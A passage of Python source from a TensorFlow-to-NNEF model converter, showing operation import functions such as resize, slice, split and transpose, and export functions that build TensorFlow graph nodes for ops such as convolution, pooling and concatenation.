assert output_size[i]%input_shape[i+1] == 0, "Unable to convert, ResizeBilinear uses non-integer factors"
factor.append(int(output_size[i]/input_shape[i+1]))
output_shape.append(int(output_size[i]))
output_shape.append(input_shape[-1])
nnef_node = node.MultilinearUpsample(input=nnef_node_input,
factor=factor,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape,
_data_format='NHWC')
return nnef_node, tf_inputs, attrs
def import_ResizeNearestNeighbor(self, tfnode):
if self.start_format == None:
self.start_format = 'NHWC'
tf_inputs = {'input':0, 'factor': 1}
attrs = {}
nnef_node_input = self.get_node_from_pool(tfnode, tf_inputs['input'])
nnef_node_factor = self.get_node_from_pool(tfnode, tf_inputs['factor'])
input_shape = nnef_node_input.output_shape[:]
if nnef_node_factor.op == 'variable':
output_size = nnef_node_factor.get_tensordatafile().get_data().get_array()[0][0]
self.remove_node_from_pool(nnef_node_factor)
else:
print(nnef_node_factor.op)
assert False, "Not currently handled"
factor = []
output_shape = [input_shape[0]]
if input_shape[1] < output_size[0]:
for i in range(len(input_shape[1:-1])):
assert output_size[i]%input_shape[i+1] == 0, "Unable to convert, ResizeNearestNeighbor uses non-integer factors"
factor.append(int(output_size[i]/input_shape[i+1]))
output_shape.append(int(output_size[i]))
output_shape.append(input_shape[-1])
nnef_node = node.NearestUpsample(input=nnef_node_input,
factor=factor,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape,
_data_format='NHWC')
else:
for i in range(len(input_shape[1:-1])):
assert input_shape[i+1]%output_size[i] == 0, "Unable to convert, ResizeNearestNeighbor uses non-integer factors"
factor.append(int(input_shape[i+1]/output_size[i]))
output_shape.append(int(output_size[i]))
output_shape.append(input_shape[-1])
nnef_node = node.NearestDownsample(input=nnef_node_input,
factor=factor,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape,
_data_format='NHWC')
return nnef_node, tf_inputs, attrs
def import_Round(self, tfnode):
tf_inputs = {'x':0}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
output_shape = nnef_node_x.output_shape[:]
nnef_node = node.Round(x=nnef_node_x,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_Rsqrt(self, tfnode):
tf_inputs = {'x':0}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
output_shape = nnef_node_x.output_shape[:]
nnef_node = node.Rsqrt(x=nnef_node_x,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_Select(self, tfnode):
tf_inputs = {'condition':0, 'true_value':1, 'false_value':2}
attrs = {}
nnef_node_condition = self.get_node_from_pool(tfnode, tf_inputs['condition'])
nnef_node_true_value = self.get_node_from_pool(tfnode, tf_inputs['true_value'])
nnef_node_false_value = self.get_node_from_pool(tfnode, tf_inputs['false_value'])
output_shape = self.define_elementwise_binary_output_shape(nnef_node_true_value, nnef_node_false_value)
nnef_node = node.Select(condition=nnef_node_condition,
true_value=nnef_node_true_value,
false_value=nnef_node_false_value,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_Shape(self, tfnode):
tf_inputs = {'x':0}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
output_shape = nnef_node_x.output_shape[:]
nnef_node = node.ShapeOf(x=nnef_node_x,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_Sigmoid(self, tfnode):
tf_inputs = {'x':0}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
output_shape = nnef_node_x.output_shape[:]
nnef_node = node.Sigmoid(x=nnef_node_x,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_Sign(self, tfnode):
tf_inputs = {'x':0}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
output_shape = nnef_node_x.output_shape[:]
nnef_node = node.Sign(x=nnef_node_x,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_Slice(self, tfnode):
tf_inputs = {'input': 0, 'begin':1, 'end':2}
attrs = {}
nnef_node_input = self.get_node_from_pool(tfnode, tf_inputs['input'])
nnef_node_begin = self.get_node_from_pool(tfnode, tf_inputs['begin'])
nnef_node_end = self.get_node_from_pool(tfnode, tf_inputs['end'])
if nnef_node_begin.op == 'variable':
begin = nnef_node_begin.get_tensordatafile().get_data().get_array()[0][0]
elif nnef_node_begin.op == 'constant':
begin = np.reshape(np.asarray(nnef_node_begin.parameters['value'], dtype=np.int32), nnef_node_begin.parameters['shape'])
else:
begin = nnef_node_begin.get_value()
if nnef_node_end.op == 'variable':
end = nnef_node_end.get_tensordatafile().get_data().get_array()[0][0]
elif nnef_node_end == 'constant':
end = np.reshape(np.asarray(nnef_node_end.parameters['value'], dtype=np.int32), nnef_node_end.parameters['shape'])
else:
end = nnef_node_end.get_value()
axes = list(range(len(begin)))
output_shape = len(axes)*[0]
for i in range(len(axes)):
output_shape[i] = int(end[i]-begin[i])
nnef_node = node.Slice(input=nnef_node_input,
axes=axes,
begin=list(begin),
end=list(end),
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_Softmax(self, tfnode):
tf_inputs = {'x': 0}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
output_shape = nnef_node_x.output_shape[:]
nnef_node = node.Softmax(x=nnef_node_x,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape,)
return nnef_node, tf_inputs, attrs
def import_Softplus(self, tfnode):
tf_inputs = {'x':0}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
output_shape = nnef_node_x.output_shape[:]
nnef_node = node.Softplus(x=nnef_node_x,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_Softsign(self, tfnode):
tf_inputs = {'x':0}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
output_shape = nnef_node_x.output_shape[:]
nnef_node = node.Softsign(x=nnef_node_x,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_Split(self, tfnode):
tf_inputs = {'value':1, 'axis': 0}
attrs = {'num_split': None}
nnef_node_value = self.get_node_from_pool(tfnode, tf_inputs['value'])
nnef_node_axis = self.get_node_from_pool(tfnode, tf_inputs['axis'])
self.remove_node_from_pool(nnef_node_axis)
split_axis = int(nnef_node_axis.parameters['value'][0])
num_split = tfnode.attr['num_split'].i
names = []
if num_split >= 1:
new_name = '['
for i in range(num_split):
if i == 0:
new_name = new_name + self.gen_node_name(tfnode.name) + ', '
names.append(self.gen_node_name(tfnode.name))
else:
new_name = new_name + self.gen_node_name(tfnode.name + ':' + str(i)) + ', '
names.append(self.gen_node_name(tfnode.name + ':' + str(i)))
new_name = new_name[:-2] + ']'
input_shape = nnef_node_value.output_shape[:]
ratio = math.floor(input_shape[split_axis]/num_split)
modu = input_shape[split_axis]%num_split
ratios = []
for i in range(len(names)):
rat_val = ratio
if modu != 0:
rat_val += 1
modu -= 1
ratios.append(int(rat_val))
nnef_node_split = node.Split(value=nnef_node_value,
axis=split_axis,
ratios=ratios,
_uid=new_name,
_output_shape=input_shape)
for i in range(len(names)):
out_shape = input_shape[:]
out_shape[split_axis] = ratios[i]
nnef_node = node.OutputVal(base_node=nnef_node_split,
base_index=i,
_uid=names[i],
_output_shape=out_shape)
self.node_pool[nnef_node.name] = nnef_node
return nnef_node_split, tf_inputs, attrs
def import_Sqrt(self, tfnode):
tf_inputs = {'x':0}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
output_shape = nnef_node_x.output_shape[:]
nnef_node = node.Sqrt(x=nnef_node_x,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_Square(self, tfnode):
tf_inputs = {'x':0}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
output_shape = nnef_node_x.output_shape[:]
nnef_node = node.Sqr(x=nnef_node_x,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_Squeeze(self, tfnode):
tf_inputs = {'input': 0}
attrs = {}
nnef_node_input = self.get_node_from_pool(tfnode, tf_inputs['input'])
input_shape = nnef_node_input.output_shape
output_shape = []
if tfnode.attr['squeeze_dims'].list.i:
for i in range(len(input_shape)):
if i not in tfnode.attr['squeeze_dims'].list.i:
output_shape.append(input_shape[i])
else:
for i in input_shape:
if i != 1:
output_shape.append(i)
output_shape = [int(v) for v in output_shape]
nnef_node = node.Reshape(input=nnef_node_input,
shape=output_shape,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape,
_maintain_format=False)
return nnef_node, tf_inputs, attrs
def import_StridedSlice(self, tfnode):
tf_inputs = {'input': 0, 'begin':1, 'end':2, 'strides':3}
attrs = {}
nnef_node_input = self.get_node_from_pool(tfnode, tf_inputs['input'])
nnef_node_begin = self.get_node_from_pool(tfnode, tf_inputs['begin'])
nnef_node_end = self.get_node_from_pool(tfnode, tf_inputs['end'])
nnef_node_strides = self.get_node_from_pool(tfnode, tf_inputs['strides'])
if nnef_node_begin.op == 'variable':
begin = nnef_node_begin.get_tensordatafile().get_data().get_array()[0][0]
elif nnef_node_begin.op == 'constant':
begin = np.reshape(np.asarray(nnef_node_begin.parameters['value'], dtype=np.int32), nnef_node_begin.parameters['shape'])
else:
begin = nnef_node_begin.get_value()
if nnef_node_end.op == 'variable':
end = nnef_node_end.get_tensordatafile().get_data().get_array()[0][0]
elif nnef_node_end.op == 'constant':
end = np.reshape(np.asarray(nnef_node_end.parameters['value'], dtype=np.int32), nnef_node_end.parameters['shape'])
else:
end = nnef_node_end.get_value()
if nnef_node_strides.op == 'variable':
strides = nnef_node_strides.get_tensordatafile().get_data().get_array()[0][0]
elif nnef_node_strides.op == 'constant':
strides = np.reshape(np.asarray(nnef_node_strides.parameters['value'], dtype=np.int32), nnef_node_strides.parameters['shape'])
else:
strides = nnef_node_strides.get_value()
for stride in strides:
assert stride == 1, "Slice operation uses a stride that is not one, currently unsupported."
axes = list(range(len(begin)))
output_shape = len(axes)*[0]
for i in range(len(axes)):
if begin[i] == -1 and end[i] == 0:
output_shape[i] = 0
elif end[i] == 0:
output_shape[i] = int(nnef_node_input.output_shape[i] - begin[i])
else:
output_shape[i] = int(end[i]-begin[i])
if 0 in output_shape:
nnef_node_slice = node.Slice(input=nnef_node_input,
axes=axes,
begin=list(begin),
end=list(end),
_uid=self.gen_node_name(tfnode.name) + '_slice',
_output_shape=output_shape)
self.node_pool[nnef_node_slice.name] = nnef_node_slice
squeeze_shape = [value for value in output_shape if value != 0]
nnef_node = node.Reshape(input=nnef_node_slice,
shape=squeeze_shape,
_uid=self.gen_node_name(tfnode.name),
_output_shape=squeeze_shape,
_maintain_format=False)
else:
nnef_node = node.Slice(input=nnef_node_input,
axes=axes,
begin=list(begin),
end=list(end),
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_Sub(self, tfnode):
tf_inputs = {'x':0, 'y':1}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
nnef_node_y = self.get_node_from_pool(tfnode, tf_inputs['y'])
output_shape = self.define_elementwise_binary_output_shape(nnef_node_x, nnef_node_y)
nnef_node = node.Sub(x=nnef_node_x,
y=nnef_node_y,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape,
_data_format=tfnode.attr['data_format'])
return nnef_node, tf_inputs, attrs
def import_Sum(self, tfnode):
tf_inputs = {'input':0, 'axis':1}
attrs = {'keep_dims': None}
nnef_node_input = self.get_node_from_pool(tfnode, tf_inputs['input'])
nnef_node_axis = self.get_node_from_pool(tfnode, tf_inputs['axis'])
input_shape = nnef_node_input.output_shape[:]
if nnef_node_axis.op == 'variable':
shape = nnef_node_axis.get_tensordatafile().get_data().get_array()[0][0]
else:
shape = [int(nnef_node_axis.parameters['value'][0])]
axes = []
for i in shape:
if i not in axes:
axes.append(i)
axes.sort()
self.remove_node_from_pool(nnef_node_axis)
output_shape = input_shape[:]
if(tfnode.attr['keep_dims'].b or tfnode.attr['keepdims'].b):
for i in axes:
output_shape[i] = 1
nnef_node_sum = node.SumReduce(input=nnef_node_input,
axes=axes,
_output_shape=output_shape,
_uid=self.gen_node_name(tfnode.name) + '_sum',)
self.node_pool[nnef_node_sum.name] = nnef_node_sum
nnef_node = node.Reshape(input=nnef_node_sum,
shape=output_shape,
_output_shape=output_shape,
_uid=self.gen_node_name(tfnode.name),
_maintain_format=True)
else:
axes.sort(reverse=True)
for i in axes:
output_shape.pop(i)
if output_shape == []:
output_shape = [1]
axes.sort()
nnef_node = node.SumReduce(input=nnef_node_input,
axes=axes,
_output_shape=output_shape,
_uid=self.gen_node_name(tfnode.name))
return nnef_node, tf_inputs, attrs
def import_Tanh(self, tfnode):
tf_inputs = {'x':0}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
output_shape = nnef_node_x.output_shape[:]
nnef_node = node.Tanh(x=nnef_node_x,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_Transpose(self, tfnode):
tf_inputs = {'input':0, 'axes': 1}
attrs = {}
nnef_node_input = self.get_node_from_pool(tfnode, tf_inputs['input'])
nnef_node_axes = self.get_node_from_pool(tfnode, tf_inputs['axes'])
axes = list(nnef_node_axes.get_tensordatafile().get_data().get_array()[0][0])
self.remove_node_from_pool(nnef_node_axes)
output_shape = []
for i in range(len(nnef_node_input.output_shape)):
output_shape.append(nnef_node_input.output_shape[axes[i]])
nnef_node = node.Transpose(input=nnef_node_input,
axes=axes,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
class TensorflowExporter(TensorflowLogger, ImporterExporter):
def __init__(self, output_model):
super(TensorflowExporter, self).__init__()
self.output_model = output_model
self.mapping = {0:0, 1:3, 2:1, 3:2}
def run(self, nnef_graph):
self.nxgraph = nnef_graph.get_nx_graph()
self.generate_tf_graph()
def format_name(self, name):
index = name.find('_')
if index != -1:
newName = name[:index] + '/' + name[index+1:]
else:
newName = name
newName = name.replace('_', '/')
return newName
def add_input(self, tfnode, nnef_node, param_name, order=[]):
index = 0
if isinstance(nnef_node.parameters[param_name], list):
nnef_node_param = nnef_node.parameters[param_name][index]
else:
nnef_node_param = nnef_node.parameters[param_name]
while nnef_node_param is not None:
if not isinstance(nnef_node_param, Node):
nodeConst = NodeDef(name=self.format_name(nnef_node.name) + '/' + param_name, op='Const')
nodeConst.attr['dtype'].type = 1
nodeConst.attr['value'].tensor.dtype = 1
nodeConst.attr['value'].tensor.float_val.extend([nnef_node_param])
self.tf_graph.node.extend([nodeConst])
tfnode.input.extend([nodeConst.name])
elif nnef_node_param.op == 'variable':
tfnode.input.extend([self.format_name(nnef_node_param.name)])
for n in self.tf_graph.node:
if (n.name) == tfnode.input[-1]:
if n.attr['value'].tensor.tensor_shape.dim:
return
shapes = nnef_node_param.parameters['shape']
if not order:
for i in range(0, len(shapes)):
n.attr['value'].tensor.tensor_shape.dim.add().size = shapes[i]
np_array_read = np.asarray(nnef_node_param.get_tensordatafile().get_data().get_array()[0], dtype=np.float32)
n.attr['value'].tensor.tensor_content = np_array_read.tobytes()
else:
new_shape = []
for i in range(len(order)):
new_shape.append(shapes[order[i]])
n.attr['value'].tensor.tensor_shape.dim.add().size = new_shape[i]
np_array_read = np.asarray(nnef_node_param.get_tensordatafile().get_data().get_array()[0], dtype=np.float32)
np_array_read = np.reshape(np_array_read, shapes)
if len(new_shape) < len(shapes):
np_array_read = np.reshape(np_array_read, new_shape)
else:
np_array_read = np.transpose(np_array_read, order)
n.attr['value'].tensor.tensor_content = np.reshape(np_array_read, new_shape).tobytes()
break
elif nnef_node_param.op == 'reshape':
tfnode.input.extend([self.format_name(nnef_node_param.name)])
if order != []:
for n in self.tf_graph.node:
if n.name == tfnode.input[-1]:
for n_shape in self.tf_graph.node:
if n_shape.name == n.input[1]:
reshape_list = list(np.frombuffer(n_shape.attr['value'].tensor.tensor_content, dtype=np.int32))
new_reshape = []
for i in order:
new_reshape.append(reshape_list[i])
n_shape.attr['value'].tensor.tensor_content = np.asarray(new_reshape, dtype=np.int32).tobytes()
elif nnef_node_param.op == 'output_val':
base_name = nnef_node_param.parameters['base_node'].name[:nnef_node_param.parameters['base_node'].name.find(',')]
if base_name[0] == '[':
base_name = base_name[1:]
if nnef_node_param.parameters['base_index'] == 0:
tfnode.input.extend([self.format_name(base_name)])
else:
name = self.format_name(base_name) + ':' + str(nnef_node_param.parameters['base_index'])
tfnode.input.extend([name])
else:
tfnode.input.extend([self.format_name(nnef_node_param.name)])
if isinstance(nnef_node.parameters[param_name], list):
index += 1
if index >= len(nnef_node.parameters[param_name]):
nnef_node_param = None
else:
nnef_node_param = nnef_node.parameters[param_name][index]
else:
nnef_node_param = None
def generate_tf_graph(self, ):
self.tf_graph = graph_pb2.GraphDef()
for nnef_node, data in self.nxgraph.nodes(data=True):
if 'node' in data:
nnef_node = data['node']
if nnef_node.name:
if hasattr(self, "export_" + nnef_node.op):
func = getattr(self, "export_" + nnef_node.op)
func(nnef_node)
else:
self.export_UNKNOWN(nnef_node)
else:
print('WARNING: nnef_node missing from op: ', nnef_node)
network_dir, model_filename = os.path.split(self.output_model)
if not os.path.exists(network_dir):
os.makedirs(network_dir)
with open(self.output_model, "wb") as f:
f.write(self.tf_graph.SerializeToString())
def export_UNKNOWN(self, nnef_node):
print(nnef_node.op + " is currently not supported!\n")
input()
def export_abs(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Abs')
self.add_input(tfnode, nnef_node, 'x')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_add(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Add')
self.add_input(tfnode, nnef_node, 'x')
self.add_input(tfnode, nnef_node, 'y')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_and(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='LogicalAnd')
#Going to be issues with type
self.add_input(tfnode, nnef_node, 'x')
self.add_input(tfnode, nnef_node, 'y')
self.tf_graph.node.extend([tfnode])
def export_area_downsample(self, nnef_node):
tfnode_shape = NodeDef(name=self.format_name(nnef_node.name) + '/size', op='Const')
tfnode_shape.attr['dtype'].type = 3
tfnode_shape.attr['value'].tensor.dtype = 3
output_size = np.asarray(nnef_node.output_shape[2:], dtype=np.int32)
tfnode_shape.attr['value'].tensor.tensor_shape.dim.add().size = len(output_size)
tfnode_shape.attr['value'].tensor.tensor_content = output_size.tobytes()
self.tf_graph.node.extend([tfnode_shape])
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='ResizeArea')
self.add_input(tfnode, nnef_node, 'input')
node.input.extend([tfnode_shape.name])
tfnode.attr['T'].type = 1
tfnode.attr['align_corners'].b = False
self.tf_graph.node.extend([tfnode])
def export_avg_pool(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='AvgPool')
self.add_input(tfnode, nnef_node, 'input')
tfnode.attr['T'].type = 1
tfnode.attr['data_format'].s = b'NHWC'
sizes = nnef_node.parameters['size']
nhwc_sizes = [sizes[0]]
for i in range(2, len(sizes)):
nhwc_sizes.append(sizes[i])
nhwc_sizes.append(sizes[1])
tfnode.attr['ksize'].list.i.extend(nhwc_sizes)
dilations = nnef_node.parameters['dilation']
if dilations != [] and dilations != [1]*4:
raise ValueError("TensorFlow does not support dilated pooling")
strides = nnef_node.parameters['stride']
if strides == []:
nhwc_strides = [1]*4
else:
nhwc_strides = [strides[0]]
for i in range(2, len(strides)):
nhwc_strides.append(strides[i])
nhwc_strides.append(strides[1])
tfnode.attr['strides'].list.i.extend(nhwc_strides)
if nnef_node.parameters['padding'] == []:
tfnode.attr['padding'].s = 'SAME'.encode('utf-8')
elif(nnef_node.parameters['padding'] == [(0, 0), (0, 0), (0, 0), (0, 0)]):
tfnode.attr['padding'].s = 'VALID'.encode('utf-8')
else:
pads = nnef_node.parameters['padding']
padding = [[pads[0][0], pads[0][1]]]
for i in range(2, len(pads)):
padding = padding + [[pads[i][0], pads[i][1]]]
padding = padding + [[pads[1][0], pads[1][1]]]
padding = np.asarray(padding, dtype=np.int32)
tfnode_pad_const = NodeDef(name=self.format_name(nnef_node.name) + "/Pad/paddings", op='Const')
tfnode_pad_const.attr['dtype'].type = 3
tfnode_pad_const.attr['value'].tensor.dtype = 3
for size in np.shape(padding):
tfnode_pad_const.attr['value'].tensor.tensor_shape.dim.add().size = size
tfnode_pad_const.attr['value'].tensor.tensor_content = padding.tobytes()
self.tf_graph.node.extend([tfnode_pad_const])
tfnode_pad = NodeDef(name=self.format_name(nnef_node.name) + "/Pad", op='Pad')
tfnode_pad.input.extend([tfnode.input[0]])
tfnode_pad.input.extend([tfnode_pad_const.name])
tfnode_pad.attr['T'].type = 1
tfnode_pad.attr['Tpaddings'].type = 3
self.tf_graph.node.extend([tfnode_pad])
tfnode.input[0] = tfnode_pad.name
tfnode.attr['padding'].s = 'VALID'.encode('utf-8')
self.tf_graph.node.extend([tfnode])
def export_batch_normalization(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='FusedBatchNorm')
self.add_input(tfnode, nnef_node, 'input', [0, 2, 3, 1])
self.add_input(tfnode, nnef_node, 'scale', [1])
self.add_input(tfnode, nnef_node, 'offset', [1])
self.add_input(tfnode, nnef_node, 'mean', [1])
self.add_input(tfnode, nnef_node, 'variance', [1])
tfnode.attr['T'].type = 1
tfnode.attr['data_format'].s = b'NHWC'
tfnode.attr['epsilon'].f = nnef_node.parameters['epsilon']
tfnode.attr['is_training'].b = False
self.tf_graph.node.extend([tfnode])
def export_ceil(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Ceil')
self.add_input(tfnode, nnef_node, 'x')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_concat(self, nnef_node):
tfnode_axis = NodeDef(name=self.format_name(nnef_node.name) + "/axis", op="Const")
tfnode_axis.attr['dtype'].type = 3
tfnode_axis.attr['value'].tensor.dtype = 3
tfnode_axis.attr['value'].tensor.tensor_shape.dim.extend([])
if len(nnef_node.output_shape) == 4:
tfnode_axis.attr['value'].tensor.int_val.extend([self.mapping[nnef_node.parameters['axis']]])
else:
tfnode_axis.attr['value'].tensor.int_val.extend([nnef_node.parameters['axis']])
self.tf_graph.node.extend([tfnode_axis])
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='ConcatV2')
self.add_input(tfnode, nnef_node, 'values')
tfnode.input.append((self.format_name(nnef_node.name) + '/axis').encode('utf-8'))
tfnode.attr['N'].i = len(nnef_node.parameters['values'])
tfnode.attr['T'].type = 1
tfnode.attr['Tidx'].type = 3
self.tf_graph.node.extend([tfnode])
def export_constant(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Const')
tfnode.attr['dtype'].type = 1
tfnode.attr['value'].tensor.dtype = 1
tfnode.attr['value'].tensor.float_val.extend([nnef_node.parameters['value'][0]])
if len(nnef_node.parameters['shape']) == 2 and nnef_node.parameters['shape'][0] == 1:
nnef_node.parameters['shape'].pop(0)
for i in range(len(nnef_node.parameters['shape'])):
tfnode.attr['value'].tensor.tensor_shape.dim.add().size = nnef_node.parameters['shape'][i]
self.tf_graph.node.extend([tfnode])
def export_conv(self, nnef_node):
conv_len = len(nnef_node.parameters['input'].output_shape)
if(conv_len == 4) and nnef_node.parameters['groups'] == nnef_node.parameters['input'].output_shape[1]:
return self.export_planewise_conv(nnef_node)
assert nnef_node.parameters['groups'] == 1, "TensorFlow does not support grouped convolutions currently."
if conv_len == 4:
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Conv2D')
self.add_input(tfnode, nnef_node, 'input', [0, 2, 3, 1])
self.add_input(tfnode, nnef_node, 'filter', [2, 3, 1, 0])
tfnode.attr['data_format'].s = 'NHWC'.encode('utf-8')
tfnode.attr['use_cudnn_on_gpu'].b = True
elif conv_len == 5:
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Conv3D')
self.add_input(tfnode, nnef_node, 'input', [0, 2, 3, 4, 1])
self.add_input(tfnode, nnef_node, 'filter', [2, 3, 4, 1, 0])
tfnode.attr['data_format'].s = 'NDHWC'.encode('utf-8')
else:
raise ValueError("Cannot handle input_size " + str(conv_len) + " yet.")
tfnode.attr['T'].type = 1
if 'dilation' in nnef_node.parameters:
dilations = nnef_node.parameters['dilation']
if dilations:
nhwc_dilations = [1]
for i in range(0, len(dilations)):
nhwc_dilations.append(dilations[i])
nhwc_dilations.append(1)
else:
nhwc_dilations = [1]*conv_len
else:
nhwc_dilations = [1]*conv_len
tfnode.attr['dilations'].list.i.extend(nhwc_dilations)
strides = nnef_node.parameters['stride']
if strides:
nhwc_strides = [1]
for i in range(0, len(strides)):
nhwc_strides.append(strides[i])
nhwc_strides.append(1)
else:
nhwc_strides = [1]*conv_len
tfnode.attr['strides'].list.i.extend(nhwc_strides)
if nnef_node.parameters['padding'] == []:
tfnode.attr['padding'].s = 'SAME'.encode('utf-8')
elif nnef_node.parameters['padding'] == [(0, 0)]*(conv_len-2):
tfnode.attr['padding'].s = 'VALID'.encode('utf-8')
else:
pads = nnef_node.parameters['padding']
padding = [[0, 0]]
for pad in pads:
padding = padding + [[pad[0], pad[1]]]
padding = padding + [[0, 0]]
padding = np.asarray(padding, dtype=np.int32)
tfnode_pad_const = NodeDef(name=self.format_name(nnef_node.name) + "/Pad/paddings", op='Const')
tfnode_pad_const.attr['dtype'].type = 3
tfnode_pad_const.attr['value'].tensor.dtype = 3
for size in np.shape(padding):
tfnode_pad_const.attr['value'].tensor.tensor_shape.dim.add().size = size
tfnode_pad_const.attr['value'].tensor.tensor_content = padding.tobytes()
self.tf_graph.node.extend([tfnode_pad_const])
tfnode_pad = NodeDef(name=self.format_name(nnef_node.name) + "/Pad", op='Pad')
tfnode_pad.input.extend([tfnode.input[0]])
tfnode_pad.input.extend([tfnode_pad_const.name])
tfnode_pad.attr['T'].type = 1
tfnode_pad.attr['Tpaddings'].type = 3
self.tf_graph.node.extend([tfnode_pad])
tfnode.input[0] = tfnode_pad.name
tfnode.attr['padding'].s = 'VALID'.encode('utf-8')
if('bias' in nnef_node.parameters and nnef_node.parameters['bias'] != 0):
tfnode.name = tfnode.name + '/conv'
self.tf_graph.node.extend([tfnode])
tfnode_add = NodeDef(name=self.format_name(nnef_node.name), op='Add')
tfnode_add.input.extend([tfnode.name])
self.add_input(tfnode_add, nnef_node, 'bias')
tfnode_add.attr['T'].type = 1
self.tf_graph.node.extend([tfnode_add])
else:
self.tf_graph.node.extend([tfnode])
def export_deconv(self, nnef_node):
assert nnef_node.parameters['groups'] == 1, "TensorFlow does not support grouped convolutions currently."
conv_len = len(nnef_node.output_shape)
tfnode_const = NodeDef(name=self.format_name(nnef_node.name) + '/output_shape', op='Const')
tfnode_const.attr['dtype'].type = 3
tfnode_const.attr['value'].tensor.dtype = 3
tfnode_const.attr['value'].tensor.tensor_shape.dim.add().size = conv_len
new_out_shape = [nnef_node.output_shape[0]]
for i in range(2, conv_len):
new_out_shape.append(nnef_node.output_shape[i])
new_out_shape.append(nnef_node.output_shape[1])
tfnode_const.attr['value'].tensor.tensor_content = np.asarray(new_out_shape, dtype=np.int32).tobytes()
self.tf_graph.node.extend([tfnode_const])
if conv_len == 4:
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Conv2DBackpropInput')
tfnode.input.extend([tfnode_const.name])
self.add_input(tfnode, nnef_node, 'filter', [2, 3, 1, 0])
self.add_input(tfnode, nnef_node, 'input', [0, 2, 3, 1])
tfnode.attr['data_format'].s = 'NHWC'.encode('utf-8')
elif conv_len == 5:
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Conv3DBackpropInputV2')
tfnode.input.extend([tfnode_const.name])
self.add_input(tfnode, nnef_node, 'filter', [2, 3, 4, 1, 0])
self.add_input(tfnode, nnef_node, 'input', [0, 2, 3, 4, 1])
tfnode.attr['data_format'].s = 'NDHWC'.encode('utf-8')
else:
raise ValueError("Cannot handle input_size " + str(conv_len) + " yet.")
tfnode.attr['T'].type = 1
if 'dilation' in nnef_node.parameters:
dilations = nnef_node.parameters['dilation']
if dilations:
nhwc_dilations = [1]
for i in range(0, len(dilations)):
nhwc_dilations.append(dilations[i])
nhwc_dilations.append(1)
else:
nhwc_dilations = [1]*conv_len
else:
nhwc_dilations = [1]*conv_len
tfnode.attr['dilations'].list.i.extend(nhwc_dilations)
strides = nnef_node.parameters['stride']
if strides:
nhwc_strides = [1]
for i in range(0, len(strides)):
nhwc_strides.append(strides[i])
nhwc_strides.append(1)
else:
nhwc_strides = [1]*conv_len
tfnode.attr['strides'].list.i.extend(nhwc_strides)
if conv_len == 4:
tfnode.attr['use_cudnn_on_gpu'].b = True
if nnef_node.parameters['padding'] == []:
tfnode.attr['padding'].s = 'SAME'.encode('utf-8')
elif nnef_node.parameters['padding'] == [(0, 0)]*(conv_len-2):
tfnode.attr['padding'].s = 'VALID'.encode('utf-8')
else:
pads = nnef_node.parameters['padding']
padding = [[0, 0]]
for pad in pads:
padding = padding + [[pad[0], pad[1]]]
padding = padding + [[0, 0]]
